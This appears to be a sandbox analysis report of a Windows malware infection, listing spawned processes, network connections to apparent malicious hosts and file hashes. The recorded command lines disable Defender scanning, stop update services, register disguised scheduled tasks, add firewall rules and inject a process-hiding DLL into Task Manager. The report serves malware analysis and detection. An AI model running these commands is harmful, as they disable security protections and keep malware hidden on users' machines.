"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:2

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6276 -ip 6276

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6276 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7oq96hr.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7oq96hr.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7832 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7804 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ni514kd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8Ni514kd.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7980 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9wH6se2.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9wH6se2.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8208 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7996 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2196,11251274600307713988,12339208163459552290,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6916 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\4BC9.exe

C:\Users\Admin\AppData\Local\Temp\4BC9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9351e46f8,0x7ff9351e4708,0x7ff9351e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2232 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3640 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3596 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2220,16445364544176527412,13472466039782171987,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3596 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\7E06.exe

C:\Users\Admin\AppData\Local\Temp\7E06.exe

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\forc.exe

"C:\Users\Admin\AppData\Local\Temp\forc.exe"

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\A332.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\F5C8.exe

C:\Users\Admin\AppData\Local\Temp\F5C8.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Users\Admin\AppData\Local\Temp\4B6B.exe

C:\Users\Admin\AppData\Local\Temp\4B6B.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\507D.exe

C:\Users\Admin\AppData\Local\Temp\507D.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Users\Admin\AppData\Local\Temp\5281.exe

C:\Users\Admin\AppData\Local\Temp\5281.exe

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4028 -ip 4028

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4028 -s 784

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 198.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
US 8.8.8.8:53 www.facebook.com udp
US 8.8.8.8:53 store.steampowered.com udp
US 157.240.5.35:443 www.facebook.com tcp
NL 142.250.179.141:443 accounts.google.com tcp
NL 104.85.0.101:443 store.steampowered.com tcp
US 8.8.8.8:53 www.epicgames.com udp
US 52.55.174.41:443 www.epicgames.com tcp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 101.0.85.104.in-addr.arpa udp
US 8.8.8.8:53 35.5.240.157.in-addr.arpa udp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 www.paypal.com udp
US 8.8.8.8:53 steamcommunity.com udp
US 151.101.1.21:443 www.paypal.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
US 8.8.8.8:53 41.174.55.52.in-addr.arpa udp
US 8.8.8.8:53 65.42.244.104.in-addr.arpa udp
US 8.8.8.8:53 21.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 113.106.207.23.in-addr.arpa udp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 8.39.65.18.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
US 157.240.5.10:443 tcp
US 172.67.209.38:80 killredls.pw tcp
NL 23.72.252.169:443 tcp
NL 23.72.252.169:443 tcp
NL 23.72.252.169:443 tcp
US 8.8.8.8:53 dub.stats.paypal.com udp
US 64.4.245.84:443 dub.stats.paypal.com tcp
JP 23.207.106.113:443 steamcommunity.com tcp
NL 23.72.252.176:443 tcp
US 172.67.209.38:80 tcp
NL 23.72.252.176:443 tcp
NL 23.72.252.176:443 tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 172.67.209.38:80 killredls.pw tcp
US 104.244.42.130:443 tcp
US 172.67.209.38:80 tcp
US 152.199.21.141:443 tcp
US 172.67.209.38:80 killredls.pw tcp
US 104.244.42.130:443 tcp
US 8.8.8.8:53 156.247.186.35.in-addr.arpa udp
US 104.18.41.136:443 tcp
US 104.18.41.136:443 tcp
US 172.67.209.38:80 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 js.hcaptcha.com udp
US 104.19.219.90:443 js.hcaptcha.com tcp
NL 194.169.175.118:80 tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 172.67.209.38:80 tcp
RU 5.42.65.80:80 5.42.65.80 tcp
US 172.67.209.38:80 killredls.pw tcp
RU 5.42.92.51:19057 tcp
US 8.8.8.8:53 190.92.42.5.in-addr.arpa udp
US 8.8.8.8:53 118.175.169.194.in-addr.arpa udp
US 172.67.209.38:80 killredls.pw tcp
RU 5.42.92.51:19057 tcp
N/A 224.0.0.251:5353 udp
RU 5.42.92.190:80 5.42.92.190 tcp
RU 5.42.64.16:443 tcp
FI 77.91.68.247:80 77.91.68.247 tcp
RU 5.42.64.16:443 tcp
RU 5.42.92.51:19057 tcp
US 172.67.180.92:80 tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
RU 5.42.92.51:19057 tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
RU 5.42.92.190:80 5.42.92.190 tcp
US 8.8.8.8:53 bluepablo.fun udp
US 194.49.94.72:80 194.49.94.72 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 194.49.94.11:80 194.49.94.11 tcp
US 104.21.18.41:80 bluepablo.fun tcp
US 172.67.180.92:80 bluepablo.fun tcp
US 204.79.197.200:443 tcp
US 8.8.8.8:53 89255725-82d4-464f-92ee-f0f35a7b91ae.uuid.databaseupgrade.ru udp
US 204.79.197.200:443 tcp
US 162.159.133.233:443 tcp
BG 185.82.216.108:443 tcp
US 8.8.8.8:53 walkinglate.com udp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe

MD5 b1af7eff09d3722134ee0e56a8391787
SHA1 c9fd5081cbe5f565ea4f5456c921fbe2f71b77b3
SHA256 f9c09726735e2796f8834e703874be7dedac3e45063b2eacd12f171a1a88be10
SHA512 65319055c8159f3d1425e2113546a71228d1c790074d219f566122b28a87feca13341c8e21dd767c43664f9fbfe94ec41201e190085a5d5c1ca1d5cf6a00b8f3

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\db3Nd93.exe

MD5 b1af7eff09d3722134ee0e56a8391787
SHA1 c9fd5081cbe5f565ea4f5456c921fbe2f71b77b3
SHA256 f9c09726735e2796f8834e703874be7dedac3e45063b2eacd12f171a1a88be10
SHA512 65319055c8159f3d1425e2113546a71228d1c790074d219f566122b28a87feca13341c8e21dd767c43664f9fbfe94ec41201e190085a5d5c1ca1d5cf6a00b8f3

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe

MD5 9f36d185aed836d9faa62eefa13c6d68
SHA1 87239f5ca0a363c1fa2fc1518d9044791c200dd9
SHA256 e871187e946cde129237b60ff4282655ce7131705cc4f7b9407fa0c5fe132d9b
SHA512 215551d5dee9a9fbe55f38457b8203c7b52a22266cb8aa993f4ec2464547326fa48e7bf8ddf5ca23395edeaa7d93d25a2283c65f8d0fbd819b94459cebdbcec9

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xQ2xo09.exe

MD5 9f36d185aed836d9faa62eefa13c6d68
SHA1 87239f5ca0a363c1fa2fc1518d9044791c200dd9
SHA256 e871187e946cde129237b60ff4282655ce7131705cc4f7b9407fa0c5fe132d9b
SHA512 215551d5dee9a9fbe55f38457b8203c7b52a22266cb8aa993f4ec2464547326fa48e7bf8ddf5ca23395edeaa7d93d25a2283c65f8d0fbd819b94459cebdbcec9

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe

MD5 4a3a28ee2a165a1b6a2e634e11db207e
SHA1 7c9fa5fb62c5b0d91789b93f63f600f3cd6523e6
SHA256 e99119a3816f7bed08ea653b0b9a234a59c7adfdade5057d910496a4febc25ae
SHA512 4b0b6f8b5f751a051bf792232aa9beeeeb183ca6f5c9ebb74b416c6ed14f5dff3514385a5a3c5f73aa283e63508294f6b8899b14cfed591227d65d2214c1a9dd

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Et9eT50.exe

MD5 4a3a28ee2a165a1b6a2e634e11db207e
SHA1 7c9fa5fb62c5b0d91789b93f63f600f3cd6523e6
SHA256 e99119a3816f7bed08ea653b0b9a234a59c7adfdade5057d910496a4febc25ae
SHA512 4b0b6f8b5f751a051bf792232aa9beeeeb183ca6f5c9ebb74b416c6ed14f5dff3514385a5a3c5f73aa283e63508294f6b8899b14cfed591227d65d2214c1a9dd

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1ns78ZL2.exe

MD5 d1cf32614763fdc9873618423d72b7af
SHA1 c238e5ddcaae14524dc7fc5393e3bf00082c7b1d
SHA256 f3fc488b208cdbe869389bbfe68705f9eaf53fc06af6f65cd4653432ba02a83a
SHA512 f9d868567f94930af15a81d890287382f83e2cf46ba5167c21db652a0c14d5013ff5a963f1ae2011d72ee8edf47fba27dcf13b61c73bc960034b8e269e086bf1

